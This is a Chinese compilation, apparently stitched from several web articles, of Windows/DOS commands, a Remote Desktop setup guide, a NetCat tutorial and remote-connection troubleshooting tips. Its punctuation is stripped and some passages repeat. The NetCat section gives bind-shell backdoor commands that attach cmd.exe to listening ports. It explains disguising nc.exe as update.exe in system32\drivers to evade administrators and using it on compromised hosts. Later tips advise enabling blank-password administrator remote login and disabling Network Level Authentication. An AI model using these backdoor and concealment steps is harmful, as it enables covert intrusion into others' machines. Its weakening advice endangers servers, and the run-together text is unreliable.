远程桌面连接命令大全

DOS 远程桌面连接命令远程桌面连接命令 DOS 远程桌面连接命令 mstsc v 192 168 1 250 console cmd 运行 command 删除文件 rd 文件名 S 创建文件 MD 文件名 1 net user admin godmour add 新建一个用户名为 admin 密码为 godmour 默 认为 user 组成员 2 net user admin del 将用户名为 admin 的用户删除 3 net user admin active no 将用户 admin 禁用 4 net user admin active yes 将用户 admin 激活 5 net user admin 查看拥护 admin 用户的情况 6 net localgroup administratros admin add 提升用户权限 7 net view IP 查看远程主机共享资源 8 net use x IP sharename 远程影射本地盘符 Z 建立连接 net use IP IPC password user name 9 net user admin godmour 把 admin 的密码修改成 godmour 10 net start servername 启动 telnet 服务 net start servername 停止 telnet 服务 运行 输入 cmd 回车在命令提示符下输入 for 1 in windir system32 dll do regsvr32 exe s 1 还原系统 tracert 61 144 56 101 查看路由是否正常工作 netstat 命令 netstat r s n a 当然 你也可以利用 netstat 命令来查看一下该命令的使用格式以及详细的参数说明 netstat 参数含义如下 r 显示本机路由表的内容 s 显示每个协议的使用状态 包括 TCP 协议 UDP 协议 IP 协议 n 以数字表格形式显示地址和端口 a 显示所有主机的端口号 运行 Netstat a 命令将显示计算机上网时与外部之间的所有连接 计算机端口与外部的连接 情况等 而 Netstat s 命令则显示电脑网络连接协议的统计信息 这样你就可以看到当前你的电脑上网络在进行哪 些连接 数据包发 送和接收的详细情况等等 添加或删除程序 control appwiz cpl 管理工具 control admintools attrib 设置文件属性 ctty 改变控制设备 defrag 磁盘碎片整理 doskey 调用和建立 DOS 宏命令 debug 程序调试命令 emm386 扩展内存管理 fc 文件比较 fdisk 硬盘分区 lh loadhigh 将程序装入高端内存 move 移动文件 改目录名 more 分屏显示 prompt 设置提示符 set 设置环境变量 smartdrv 设 置磁盘加速器 setver 设置版本 subst 路径替换 vol 显示指 定的磁盘卷标号 xcopy 拷贝目录和文件 mstsc XP 自带远程 secpol msc s 本地安全策略 services msc s 服务 compmgmt msc 计算机管理 jsjgl msc eventvwr msc s 事件查看器 odbcad32 exe 数据源 ODBC perfmon msc s 性能 comexp msc 组件服务 control userpasswords2 察看当前 XP 用户 gpedit msc 组策略 regedit 注册表 dxdiag DirecTX 诊断工具 gpedit msc 组策略 winver 检查 Windows 版本 wmimgmt msc 打开 windows 管理体系结构 WMI wupdmgr windows 更新程序 wscript windows 脚本宿主设置 write 写字板 winmsd 系统信息 wiaacmgr 扫描仪和照相机向导 winchat XP 自带局域网聊天 mem exe 显示内存使用情况 Msconfig exe 系统配置实用程序 mplayer2 简易 widnows media player mspaint 画图板 mplayer2 媒体播放机 magnify 放大镜实用程序 mmc 打开控制台 mobsync 同步命令 drwtsn32 系统医生 devmgmt msc 设备管理器 dfrg msc 磁盘碎片整理程序 diskmgmt msc 磁盘管理实用程序 dcomcnfg 打开系统组件服务 ddeshare 打开 DDE 共享设置 dvdplay DVD 播放器 net stop messenger 停止信使服务 net start messenger 开始信使服务 notepad 打开记事本 nslookup 网络管理的工具向导 ntbackup 系统备份和还原 narrator 屏幕 讲述人 ntmsmgr msc 移动存储管理器 ntmsoprq msc 移动存储管理员操作请求 netstat an TC 命令检查接口 syncapp 创建一个公文包 sysedit 系统配置编辑器 sigverif 文件签名验证程序 sndrec32 录音机 shrpubw 创建共享文件夹 secpol msc 本地安全策略 syskey 系统加密 一旦加密就不能解开 保护 windows xp 系统的双重密码 services msc 本地服务设置 Sndvol32 音量控制程序 sfc exe 系统文件检查器 sfc scannow windows 文件保护 tsshutdn 60 秒倒计时关机命令 tourstart xp 简介 安装完成后出现的漫游 xp 程序 taskmgr 任务管理器 eventvwr 事件查看器 eudcedit 造字程序 explorer 打开资源管理器 packager 对象包装程序 perfmon msc 计算机性能监测程序 progman 程序管理器 regedit exe 注册表 rsop msc 组策略结果集 regedt32 注册表编辑器 rononce p 15 秒关机 regsvr32 u dll 停止 dll 文件运行 regsvr32 u zipfldr dll 取消 ZIP 支持 cmd exe CMD 命令提示符 chkdsk exe Chkdsk 磁盘检查 certmgr msc 证书管理实用程序 calc 启动计算器 charmap 启动字符映射表 cliconfg SQL SERVER 客户端网络实用程 序 Clipbrd 剪贴板查看器 conf 启动 netmeeting compmgmt msc 计算机管理 cleanmgr 垃圾整理 ciadv msc 索引服务程序 osk 打开屏幕键盘 odbcad32 ODBC 数据源管理器 oobe msoobe a 检查 XP 是否激活 lusrmgr msc 本机用户和组 logoff 注销命令 iexpress 木马捆绑工具 系统自带 Nslookup IP 地址侦测器 fsmgmt msc 共享文件夹管理器 utilman 辅助工具管理器 gpedit msc 组策略 cleanmgr 垃圾整理 ciadv msc 索引服务程序 odbcad32 ODBC 数据源管理器 oobe msoobe a 检查 XP 是否激活 lusrmgr msc 本机用户和组 logoff 注销命令 iexpress 木马捆绑工具 系统自带 Nslookup IP 地址侦测器 fsmgmt msc 共享文件夹管理器 utilman 辅助工具管理器 DOS Disk Operation System 磁盘操作系 C 盘符 Path 路径 Filename 文件名 ext 扩展名 Filespec 文件标识符 方括号中的项目是可选项 用户可以根根据需要不输入这些内容 大括号表示其中的项目必选一项 竖线表示两侧的内容可取其一 表示可重复项 表示一个字符串 只代表一个字符 查找以字母 y 开头的所有文件 可以输入以下命令 dir y 如果要查找所有扩展名为 exe 的文件 可以用 dir exe 只 代表一个字符 例如我要查找第二个字母为 s 的所有文件 可以输入 DIR s dir 格式 dir C path filename ext o s p w a dir 是 DOS 命令中最常用的一个 p 显示信息满一屏时 暂停显示 按任意键后显示下一屏 o 排序显示 o 后面可以接不同意义的字母 w 只显示文件名目录名 每行五个文件名 即宽行显示 s 将目录及子目录的全部目录文件都显示 cd 是英文 change directory 改变目录 的缩写 格式 cd C path 逐层退出 cd copy 在英文中是复制的意思 复制一个或一组文件到指定的磁盘或目录中 copy C path filename ext C path filename ext C purple 目录的所有文件复制到软盘 C copy purple A ren 是英文 rename 重新命名 的简写 对指定磁盘 目录中的一个文件或一组文件更改名 称 格式 ren C path filename1 ext filename2 ext 说明 改名操作只限于某个文件某组文件的名称 它不会更改文件所在的目录 如果使用了通 配符 则对一批文件进行更名 type 功能 在屏幕上显示文本文件内容命令 格式 type C path filename ext type 命令用来在屏幕上快速 简便地显示文本文件的内容 扩展名为 TXT 的文件是文本文件 如果用这个命令显示扩展名为 EXE 或 COM 等其它文件 输出的结果往往是一些乱七八糟的符号并伴有无规则的响铃声 有时甚至会出现死机现象 format 磁盘格式化 C path format drive S diskcopy 翻译成中文就是磁盘复制 复制出一个和原来磁盘内容一模一样的磁盘 格式 diskcopy 源驱动器名 目的驱动器名 说明 它的主要用途就是用来备份 比如我们的电脑在刚买来时 会随机附带一些设备驱动程 序磁盘 这些驱动程序在以后都有可能用到 为 防止这些磁盘的损坏 一定要将它们都备份一套 这时 使用 diskcopy 命令是比较快捷和方 便的 deltree 删除目录树 格式 C path DELTREE C1 path1 C2 path2 说明 这个命令将整个指定目录树全部消灭 而不管它是否是只读 隐藏与否 使用应特别小 心 它是一个危险命令 mem 是 memory 的缩写 功能 该命令用来查看你的计算机内存有多少 以及内存的使用情 况 格式 直接键入 mem 命令 chkdsk 是 check disk 的缩写 功能 用来检查你的磁盘的使用情况 格式 chkdsk 磁 盘名 说明 例如要检查 A 盘使用情况 就输入 chkdsk A 检查 c 盘使用情况 就输入 chkdsk C 如果直接输入 chkdsk 就检 查当前磁盘的使用情况 sys 传递系统文件命令 将 DOS 的两个隐含的系统 IO SYS 和 MSDOS SYS 传送到目标磁 盘的特定位置上 并将 COMMAND COM 文件复制过去 完成后 目标盘成为 DOS 的启动盘 格式 C path SYS C1 path d2 说明 由于这几个文件需要复制到特定位置上 所以用 COPY 命令完成的复制未必能够启动 机器 能过 SYS 命令 DOS 可以将目标盘已占据特定位 置的文件移动 并将系统文件复制到相应位置上 参数 C1 path 用来指明系统文件所在目录 如不指明 则缺省为当前盘的当前目录 所以这个 命令一般要在源盘的根目录进行 pass 功能 设定 DOS 寻找 COM EXE BAT 文件的所在目录 格式 path drive path 或 path 说明 只打 path 没有参数时 只显示环境变量内容 有参数时 重新设置 path 变量 在没 有指定 path 环境变量时 用户发出的命令 DOS 首先 判断其是否为内部命令 再查找当前目录中是否有主文件名是该命令的可执行文件 如果均不 是 则显示信息 Bad command or filename 如果发出了指定路径的命令 则在指定径中依次查找 仍找不到则出现上述提示 cls 清除显示器屏幕上的内容 使 DOS 提示符到屏幕左上角 远程桌面连接百科名片 远程桌面连接组件是从 Windows 2000 Server 开始由微软公司提供的 在 WINDOWS 2000 SERVER 中他不是默认安装的 该组件一经推出受到了很多用户的拥护和喜好 所以在 WINDOWS XP 和 2003 中微软公司将该组件的启用方法进行了改革 通过简单的勾选就可以 完成在 XP 和 2003 下远程桌面连接功能的开启 目录 隐藏 1 远程桌面的功能 2 远程桌面的前世今生 3 启动远程桌面连接的方法 1 WINDOWS 2000SERVER 3 远程桌面的配置及应用一 必要组件安装 二 启用或禁用远程连接 三 在客户端应用 四 终端服务配置 4 使用远程桌面连接的方法 1 WINDOWS XP 和 2003 操作系统 2 其他 WINDOWS 操作系统 5 远程桌面的端口 1 远程桌面的功能 2 远程桌面的前世今生 3 启动远程桌面连接的方法 1 WINDOWS 2000SERVER 3 远程桌面的配置及应用 一 必要组件安装 二 启用或禁用远程连接 三 在客户端应用 四 终端服务配置 4 使用远程桌面连接的方法 1 WINDOWS XP 和 2003 操作系统 2 其他 WINDOWS 操作系统 5 远程桌面的端口 编辑本段 1 远程桌面的功能 当某台计算机开启了远程桌面连接功能后我们就可以在网络的另一端控制这台计算机了 通过远程桌面功能我们可以实时的操作这台计算机 在上面安装软件 运行程序 所有的一切 都好像是直接在该计算机上操作一样 这就是远程桌面的最大功能 通过该功能网络管理员可 以在家中安全的控制单位的服务器 而且由于该功能是系统内置的所以比其他第三方远程控制 工具使用更方便更灵活 编辑本段 2 远程桌面的前世今生 说起远程桌面很多用户都认为是从 WIN2000 SERVER 才开始引入的 实际上我们可以 在 WIN98 甚至是 DOS 中看到他的身影 远程桌面采用的是一种类似 TELNET 的技术 他是 从 TELNET 协议发展而来的 计算机发展的早期在很多客户机硬件配置不高无法独立运行程序的情况下 TELNET 协议 应运而生 他是一种 C S 模式 客户机可以通过 TELNET 登录到高配置的服务器上 在服务 器上运行程序 当程序运行时所有的运算与存储都是教给服务器来完成的 当运算结束后服务 器才把结果反馈回客户机 这样就可以在客户机配置不够的情况下完成程序的运行工作 而且 运行结果出来的一点不慢 远程桌面连接就是从 TELNET 发展而来的 通俗的讲他就是图形化的 TELNET 所以在下 文中我们讲解远程桌面连接的使用时也会稍微介绍一些 TELNET 的相关知识 编辑本段 3 启动远程桌面连接的方法 WINDOWS 2000 SERVER WINDOWS XP 和 WINDOWS 2003 这三个系统的开启 远程桌面方法各不相同 我们一一介绍 1 WINDOWS 2000SERVER WINDOWS2000 系统中 PROFESSIONAL 版本是不能开启远程桌面功能让别人访问的 但 SERVER 版可以开启 不过需要我们安装相应的 WINDOWS 组件 方法如下 第一步 通过任务栏的 开始 设置 控制面板 选择里头的 添加 删除程序 第二步 在左边选择 添加 删除 WINDOWS 组件 第三步 稍后会出现添加删除 WINDOWS 组件窗口 我们从中选择 终端服务 然后点 下一步 进行安装 这里要注意一点的是在安装过程中需要我们插入 WINDOWS 2000SERVER 系统光盘到光驱中 第四步 安装完毕后需要重新启动计算机 重启后就完成了在 WINDOWS 2000SERVER 下的远程桌面连接功能的安装工作 2 WINDOWS XP 正如上文提到的 WINDOWS2000 引入远程桌面连接功能后受到了广大用户的好评 大 家普遍认为开启该功能的方法太复杂 而且在使用时不能保证每个人都拥有 WINDOWS2000SERVER 光盘 因此在 XP 和 2003 系统中微软将远程桌面开启的操作进行 了简化 第一步 在桌面 我的电脑 上点鼠标右键 选择 属性 第二步 在弹出的系统属性窗口中选择 远程 标签 第三步 在远程标签中找到 远程桌面 在 容许用户连接到这台计算机 前打上对勾后确 定即可完成 XP 下远程桌面连接功能的启用 3 WINDOWS 2003 WINDOWS2003 开启方法和 XP 类似 同样对操作步骤进行了简化 方法如下 第一步 在桌面 我的电脑 上点鼠标右键 选择 属性 第二步 在弹出的系统属性窗口中选择 远程 标签 第三步 在远程标签中找到 远程桌面 在 容许用户连接到这台计算机 前打上对勾后确 定即可完成 2003 下远程桌面连接功能的启用 编辑本段 3 远程桌面的配置及应用 远程桌面 Web 连接是 ActiveX 控件 该控件实际上提供了与完整终端服务客户端相同 的功能 但它旨在通过 Web 传递该功能 嵌入网页时 即使用户的计算机上并未安装完整的 远程桌面连接客户端 远程桌面 Web 连接也可以作为与终端服务器连接的客户端会话的宿主 以 Windows2003 为例 一 必要组件安装 打开 控制面板 添加或删除程序 添加或删除 Windows 组件 应用程序服务器 详细信息 Internet 信息服务 IIS 详细信息 万维网服务 详细信息 勾选 远程桌面 Web 连接 连点三个 确定 下一步 等待完成 二 启用或禁用远程连接 1 打开控制面板中的系统 2 在 远程 选项卡上 选中或清除 允许用户远程连接到您的计算机 复选框 单击 选择 远程用户 在随后出现的对话框中添加或删除用户 单击 确定 两次 三 在客户端应用 在 开始 运行 在运行框中键入 HTTP 服务器 TSWEB 确定 若是第一次在 本客户端使用 会要求下载 ActiveX 控件 在 服务器 后的文本框中键入服务器名 在 大小 后的下拉列表中选择远程桌面的分辨率 请选择 全屏 否则远程桌面会显示在浏览器中 回车后即可看到登录窗口 键入用户名与密码即可进入远程桌面 其它就同使用本地机一样 若要退出 请选择 注销 若一会儿后还要进入 请选择 断开 再进入时方法同前 当然如 果权限足够大 还可选择 重新启动 关机 注意在使用时 不要直接关掉 远程桌机 Web 连接 的浏览器窗口 否则远程桌面相当于 断开 并未注销 四 终端服务配置 1 请依次单击 开始 和 控制面板 双击 管理工具 再双击 终端服务配置 在控制台 树中 单击 连接 在详细信息窗格中 右键单击要配置客户端设备映射的连接 然后单击 属 性 若要使远程桌面也成为多媒体 请在 客户端设置 选项卡下选中 颜色深度的最大值 并 在下拉列表中选择适当的值 禁用下列项目 下 请不要选中 音频映射 以使远程桌面也能 播放音乐 2 默认的登录名设置 3 在 Internet 信息服务 IIS 管理器 下查找到 TSWEB 虚拟目录的具体位置 修改 Default htm 文件 就不需要每次填入服务器名 用记事本打开 Default htm 找到 input name Server 修改 Value 服务器名或 IP 地址 保存退出 1 编辑本段 4 使用远程桌面连接的方法 使用远程桌面连接的方法很简单 因为一旦连接到服务器上就和操作本地计算机一样了 所以唯一要讲解的就是连接操作 如何连接到开启了远程桌面功能的计算机呢 我们需要远程 桌面连接登录器 1 WINDOWS XP 和 2003 操作系统 这两个系统将远程桌面连接程序内置到附件中 我们不用安装任何程序就可以使用远程桌 面连接 第一步 通过任务栏的 开始 程序 附件 通讯 远程桌面连接 来启动登录程序 命 令号运行 mstsc 第二步 在图 4 界面中的 计算机 处输入开启了远程桌面功能的计算机 IP 地址 第三步 点击 连接 按钮后我们就可以成功登录到该计算机上了 连接上去后如图 5 所示 和操作自己计算机一样方便一样快捷 对方的机要开启了允许远程连接到此计算机 具体做 法是 我的电脑 属性 远程 远程桌面 把勾打上 确定 2 其他 WINDOWS 操作系统 2000 及以前的 WINDOWS 中系统没有将登录工具放到附件中 我们有两个方法获得登 录器并实现远程桌面的连接功能 方法一 使用 XP 光盘登录器 MSRDPCLI 在 XP 系统光盘盘符下 SUPPORT TOOLS 目录有一个叫做 MSRDPCLI exe 的程序 该程序实际上是一个远程桌面连接登录器 在 WIN98 2000 机器上运行 XP 光盘目录下的 msrdpcli exe 将自动安装远程桌面连接程序 安装过程非常简单 一路 下一步 即可 完毕 以后通过 开始 程序 附件 通讯 远程桌面连接 就可以登录网络上开启远程桌面功能的 计算机了 方法二 第三方登录器 实际上网络中有很多站点都提供了远程桌面登录器的下载 我们在 98 系统或 2000 系 统上下载该登录器就可以完成登录远程桌面的功能 编辑本段 5 远程桌面的端口 3389 端口 这一端口最好不要开 也就是说不要开启远程桌面 因为 HACKER 会通过 这一端口进入您的计算机 种植木马 现在我们的计算机安全意识越来越强 开放 135 端口的 计算机越来越少 所以 HACKER 们就希望通过这一端口抓肉鸡 编辑本段 6 使 Windows XP 的远程桌面支持多用户登陆 在 Windows XP 中 远程桌面只能一个用户登陆 这样在某些时候其实是不方便的 不 过我们可以通过以下办法实现多用户使用远程桌面登陆 打开 Windows XP Pro SP2 远程桌面 远程协助 的多用户支持 Enable Concurrent Sessions 主要分为三步 1 打开多用户支持 注册表 regedit 2 替换 termsvr dll 3 更改用户登录或注销的方式 使用欢迎屏幕 使用快速用户切换 控制面板 用户账户 更改用户登录或注销的方式 1 通过注册表打开多用户支持 将以下内容复制到记事本 保存成 reg 文件 然后打开保存的文件导入注册表即可 REGEDIT4 HKEY LOCAL MACHINE SYSTEM CurrentControlSet Control Terminal Server Licensing Core EnableConcurrentSessions dword 00000001 也可以使用命令行完成 将以下内容复制到记事本 粘贴到记事本保存成 bat 文件 然 后打开保存的文件即可完成 echo off setlocal set regkey HKLM SYSTEM CurrentControlSet Control Terminal Server Licensing Core reg add regkey v EnableConcurrentSessions T REG DWORD D 1 f endlocal 还有一种方式是 点 开始 菜单 点运行 在弹出的对话框中 键入 REGEDIT 然后按回车打开注册表编辑 器 在注册表中找到 HKEY LOCAL MACHINE System CurrentControlSet Control Terminal Server Licensing Core 建立一个类型为 DWORD 的新键 键名为 EnableConcurrentSessions 键值为 1 2 替换系统中的 termsvr dll 从相关站点下载到 termsrv dll 文件 替换两处 C WINDOWS system32 dllcache termsrv dll C WINDOWS system32 termsrv dll 系统应该会提示文件使用中无法替换 因为文件使用中 最简单的办法就是先把这两个文 件改个名字 先改 C WINDOWS system32 dllcache termsrv dll 的文件名 然后再改 C WINDOWS system32 termsrv dll 的 顺序不能错 否则会自动恢复 改名后系统可 能会提示系统文件被修改 不用理它 按取消再按确定就可以了 然后把下载到的文件解压到 相应的位置即可 3 更改用户登录或注销的方式 使用欢迎屏幕 使用快速用户切换 更改方法 打开控制面板 打开用户账户 点更改用户登录或注销的方式 勾选 使用欢迎屏幕 和 使用快速用户切换 点应用选项 然后重新启动电脑即可完成操 作 相关系统服务 Related OS Services TermService Terminal Services 允许多位用户连接并控制一台机器 并且在远程计算机上显示桌面和应用程序 这是远程桌面 包括管理员的远程桌面 快速用户转换 远程协助和终端服务器的基础结 构 FastUserSwitchingCompatibility Fast User Switching Compatibility 为在多用户下需要协助的应用程序提供管理 PS 这样设置之后系统就可以用多个用户进行远程桌面登陆了 但是在测试中发现 这样 仅仅能登陆 2 个不同用户名的用户 当登陆第三个时 就会提示要断开已经登陆的其中一个了 不过对于我们而言 通常已经够用了 补充 经本人实际应用 发现 使 Windows XP 的远程桌面支持多用户登陆 中的第 2 步 替换系统中的 termsvr dll 需要在安全模式下替换才能生效 附 安全模式进入方式 开机 时一直按 F8 键会跳出系统选择菜单 选择第一个 安全模式 即可进入 51CTO com 专家特稿 在入侵中它是最经典的工具之一 NetCat 被所有的网络安全爱好 者和研究者称之为瑞士军刀 通过名字大家就能知道他的功能足够丰富 nc 的全称为 NetCat 它能够建立并接受传输控制协议 TCP 和用户数据报协议 UDP 的连接 Netcat 可在这些连接上读写数据 直到连接关闭为止 它可以通过手工或者脚本与应用层的网 络应用程序或服务进行交互 从技术上来讲 NetCat 并不能产生 UDP 连接 因为 UDP 是一 种无连接的协议 NetCat 没有图形界面 很粗糙 很原始 nc 可以通过很多途径下载得到 unix 和 Winodws 平台下的官方站点是 http nc 的命令行 nc 的基本命令行形式是 nc options host ports 其中 host 是要扫描的主机名或 IP 地址 ports 要么是一个单独的端口 要么是一个端口范围 用 m n 的形式指定 要么是一系列用空 格隔开的单个端口 d 只对 Windows 操作系统有用 该选项使 NetCat 以隐蔽模式工作 从而脱离 MS DOS 命 令提示符下环境运行 使得 nc 不需要保持打开命令窗口便可在监听模式下运行 也可以帮助 黑客很好地隐藏监听 NetCat 实例而不被系统管理员发现 e 如果 NetCat 使用 gaping security hole 选项进行编译 那么只要某人在 NET 后台所监 听的任何端口上建立连接 该 NetCat 都将执行 且客户端的 NetCat 会通过管道将 I O 传输到 在别处监听的另一个 NetCat 实例中 使用这个选项非常危险 除非你对 nc 相当了解 起码 知道你自己在做什么 这是在系统中建立后门 shell 的一个非常快捷且容易的方法 i 延时间隔 表示在两次数据发送之间 nc 等待的时间 例如 当经过管道传输一个文件到 nc 的时候 在传输输入的下一行之前 nc 将等待的秒数 当使用 nc 对一台主机的多个端口之间 进行操作时 在切换到下一个端口之前 nc 等待的秒数 这样可以使黑客在进行数据传输或对 一个服务进行攻击的时候更加隐蔽 也可以帮助你的端口扫描不被入侵检测系统和系统管理员 发现 g 这个选项具有欺骗性 nc 支持 loose source routing 松散源路由 你可以在命令行中 指定多达 8 个 g 选项来强迫 nc 流量经过特定的 IP 地址 这在你为流量设置伪造的源 IP 地址 时 可以利用这个方法达到通过防火墙的过滤器或者允许访问主机列表 希望接收到从主机返 回的响应 G 该选项让用户在 g 选项所指定的路由列表中指定的一个地址作为当前的下一路由 由于 IP 地址为 4 字节大小 IPV4 所以这个参数总是 4 字节的倍数 例如 4 代表路由表中的第一 个 IP 地址 8 代表第二个 IP 地址 依次类推 这在伪造部分源路由表使得报文看起来相当的 有用 在进行欺骗和源路由时 这个功能有助于屏蔽你的位置 但也不一定能接收到响应报文 因为响应报文将经过由伪造的 IP 地址反路由回来 l 该选项切换 nc 的监听模式 此选项必须与 p 选项一起使用以告诉 nc 绑定某个指定的 TCP 端口并等待到来的连接 若换成 u 选项 则应使用 UDP 端口而非 TCP 端口 L 该选项在 Windows 版本中有用 当一个连接被关闭后 使用相同的命令行选项进行重启监 听模式 即使此时初始的连接已经结束 nc 也能在不需要用户干涉的情况下接收后面新的连接 与 l 一样 必须与 p 同时使用 n 该选项告诉我们 nc 不做任何主机名查找的工作 0 对数据执行一次十六进制转储 hex dump 并将其存储在 hexfile 中 命令 nc o hexfile 将把双向通信的数据记录下来 在每行的开始处会有一个 用来分别指示是进 入数据还是外出数据 如果只想得到对进入数据的十六进制转储 可以使用 nc ohexfile 命 令 p 让用户指定一个 nc 应使用的本地端口号 当通过 l 或 L 选项来使用监听模式的时候 这个 参数是必需的 如果没有为外出连接指定这个参数 则与大多数其他 TCP 或 UDP 客户程序的 做法一样 nc 将使用系统分配给他的任何端口 r 该参数使 nc 可以随机选择本地和远程端口 当使用 nc 在系统中范围很大的一批端口上获 取信息时 要想混合源端口和目标端口的顺序看起来不怎么象端口扫描 这个选项是很有用的 当这个选项与 i 选项和一个足够大的间隔结合使用的时候 在不被注意的端口扫描成功几率能 得到很大提升 s 指定 nc 建立连接时所使用的 IP 地址 该选项允许黑客做一些工作 它允许黑客隐藏他们 的 IP 地址或假冒他人的 IP 地址 但是要得到路由到他们所欺骗的地址的任何信息 都需要使 用 g 源路由选项 其次 当处于监听模式时 大多数情况下都可以与一个已经监听的服务 预 先绑定 所有 TCP 和 UDP 服务都绑定到某个端口 t 如果使用 telnet 选项编译 nc 就可以与 telnet 服务器进行 telnet 选项协商 虽然它的响 应是毫无意义的信息 但可以通过该状态看到连接 23 端口的信息 u nc 使用 UDP 而非 TCP 在客户模式和监听模式下都起作用 v 控制 nc 将要做的事情达到的程度 如使用 nc v 那么 nc 将仅吐出它所接收到的数据 一个单独的 v 可以知道它连接或绑定的地址是否有问题发生 第 2 个 v 可以让 nc 在一个连接 结束的时候让你知道这个连接总共发送和接收了多少数据 w 控制在一个连接上 nc 放弃之前等待的时间 同时也告诉 nc 当在标准输入上接收到一个 eof end of file 之后应该等待多长时间来关闭连接并退出 如果你通过 nc 向远程服务器发 送命令并且期望大量的数据返回 例如 向一台 web 服务器发送一个 http 命令以下载一个大 文件 该选项是很有用的 nc 的具体使用 c nc exe l p 4455 d e cmd exe 可以很好的隐藏一个 NetCat 后门 c nc exe p 4455 d L e cmd exe 这个命令可以让黑客利用 NetCat 重新返回系统 直 到系统管理员在任务管理器中看见 nc exe 在运行 从而发现这个后门 我们一样可以把它做 的更加隐蔽 c move nc exe c windows system32 Drivers update exe c windows systeme32 drivers update exe p 4455 d L e cmd exe 系统管理员可能把特权附属于一些无害的程序 如 update exe 等 黑客也可以隐藏命令行 c windows systme32 drivers update exe cmd line l p 4455 d L e cmd exe c nc l p 80 监听 80 端口 nc l p 80 c log dat 监听 80 端口 并把信息记录到 log dat 中 nc v l p 80 监听 80 端口 并显示端口信息 nc vv l p 80 监听 80 端口 显示更详细的端口信息 nc l p 80 t e cmd exe 监听本地的 80 端口的入站信息 同时将 cmd exe 重定向到 80 端口 当有人连接的时候 就让 cmd exe 以 telnet 的形式应答 当然这个最好用在控制的肉 鸡上 nc v ip port 扫瞄某 IP 的某个端口 nc v z ip port port 扫描某 IP 的端口到某端口 nc v z u ip port port 扫描某 IP 的某 UDP 端口到某 UDP 端口 51CTO com 独家特稿 相信不少网络管理员在平时的工作中 需要对局域网中的多台服务 器系统进行管理维护 为了提高管理维护效率 他们往往会开通远程桌面连接功能 以便日后 可以在局域网的任何位置处都能及时进行管理 维护操作 可是在充分享受远程管理便利的同 时 网络管理员们时常也会遭遇远程连接不顺畅的麻烦 面对这样的麻烦 很多人常常表现得 手足无措 不知道该如何进行快速应对 为此 本文就从细节出发 为各位朋友贡献几则让远 程连接一路通畅的私房秘籍 相信大家能从中收到一些启发 1 不对空密码帐号限制 在安装 配置服务器系统的过程中 很多网络管理员为了图方便 往往会将 administrator 帐 号的密码设置成空白密码 日后不需要输入系统管理员帐号密码 就能实现快速登录目的 可 是 当我们尝试在局域网的其他计算机中 利用 administrator 帐号来远程连接目标服务器系 统时 可能会发现远程连接怎么也不能成功 在对各种可能因素进行仔细检查之后 相信不少 网络管理员也找不到具体的故障原因 遇到这种现象时 我们不妨在目标服务器系统中 用鼠 标右键单击对应系统桌面中的 我的电脑 图标 从弹出的快捷菜单中执行 属性 命令 打开目 标服务器的系统属性设置窗口 单击其中的 远程 标签 并在对应标签设置页面中 看看 允许 用户远程连接到这台计算机 选项是否处于有效激活状态 如果发现该选项处于不可点选状态时 那问题很可能是服务器系统对空白密码的访问权限进行了限制 此时我们必须按照下面的操作 来取消系统对空白密码的限制 首先以系统管理员权限登录进入目标服务器系统桌面 依次单击其中的 开始 运行 命令 在 弹出的系统运行对话框中 输入字符串命令 gpedit msc 单击 确定 按钮后 打开对应系统 的组策略控制台窗口 其次在该控制台窗口的左侧子窗格中 用鼠标逐一点选 计算机配置 Windows 设置 安 全设置 本地策略 安全选项 分支 在对应 安全选项 分支项目的右侧显示区域 用鼠标 右键单击 账号 使用空白密码的本地账号只允许进行控制台登录 选项 从其后出现的快捷菜 单中执行 属性 命令 打开如图 1 所示的设置对话框 图 1 在这里我们发现目标服务器系统在默认状态下 只允许空白密码账号进行控制台登录操作 而 没有权限进行其他方面的操作 这也是为什么我们无法使用空白密码的 administrator 帐号远 程连接目标服务器系统的原因 要想让远程连接操作顺畅 我们必须选中这里的 已禁用 选项 同时单击 确定 按钮完成组策 略设置操作 这么一来我们日后再次尝试使用空白密码的 administrator 帐号远程连接目标服 务器系统时 就不会遇到什么故障提示了 同时也可以对目标服务器系统进行一系列操作了 2 取消网络级身份限制 如果我们通过远程桌面功能 企图远程连接安装了 Windows Server 2008 系统的服务器系 统时 也有可能遇到这样一种奇怪的故障现象 那就是系统屏幕上出现了身份验证对话框 可 是在其中无论输入什么登录帐号 哪怕是系统管理员帐号 也不能成功登录进目标服务器系统 面对这种故障现象 很多人往往回束手无策 根本不知道该采取什么措施进行有效应对 其实 这种现象在 Windows Server 2008 服务器系统中可能比较常见 出现这种现象的主要原因 可能就是 Windows Server 2008 系统在默认状态下使用了网络级身份验证功能 该功能要 求局域网中的普通客户端系统必须使用 Windows Vista 系统或 Windows Server 2008 系统 否则就容易出现无论输入什么帐号都不能成功登录的故障现象 要想避免这种故障现象 我们 可以按照下面的操作来取消网络级身份验证功能 首先在 Windows Server 2008 系统桌面中右击 计算机 图标 从其后出现的快捷菜单中点选 管理 选项 打开对应系统的计算机管理窗口 在该窗口左侧列表区域中单击 远程设置 选项 此时系统屏幕上会出现一个如图 2 所示的远程桌面连接设置对话框 图 2 其次在该对话框的 远程桌面 位置处 我们发现 Windows Server 2008 系统在默认状态下已 经选中了 只允许运行带网络级身份验证的远程桌面的计算机连接 这个功能选项 这样一来安 装了其他操作系统的普通计算机无论如何也无法与目标服务器系统建立远程桌面连接了 为了让局域网中的任意一台普通计算机都能很顺畅地与 Windows Server 2008 服务器系统 建立连接 我们必须选中这里的 允许运行任意版本远程桌面的计算机连接 功能选项 同时单 击 确定 按钮保存好上述设置操作 如此一来日后远程连接 Windows Server 2008 系统的成 功率就会提高很多了 3 赋予帐号远程连接权限 有的时候 为了保护远程桌面连接的安全性 网络管理员可能不允许用户随意使用 administrator 帐号 来与服务器系统建立远程桌面连接 可是 当我们尝试使用自己的用户 帐号远程连接目标服务器系统时 却发现服务器系统不接收自己的登录连接请求 这是什么原 因呢 出现这种情况时 多半是我们使用的登录帐号不支持远程桌面连接权限 此时我们可以 按照下面的操作步骤来获取远程桌面连接权限 确保远程连接服务器系统一路顺畅 首先在目标服务器系统桌面中用鼠标右键单击 我的电脑 图标 从其后的快捷菜单中执行 管理 命令 打开对应系统的计算机管理窗口 在该管理窗口的左侧子窗格中 依次点选 计算机管理 系统工具 本地用户和组 用户 分支选项 在对应 用户 分支选项的右侧显示区域中 找 到我们自己的用户帐号 并用鼠标右键单击该帐号选项 再点选右键菜单中的 属性 命令 进 入特定用户帐号的属性设置窗口 其次单击该设置窗口中的 隶属于 标签 在对应标签设置页面中单击 添加 按钮 再依次点击 高级 立即查找 按钮 选中 Remote Desktop Users 选项 再单击 确定 按钮保存好上 述设置操作 如此一来我们自己使用的用户帐号日后就具有远程桌面连接权限了 当然 我们也可以使用另外一种方法 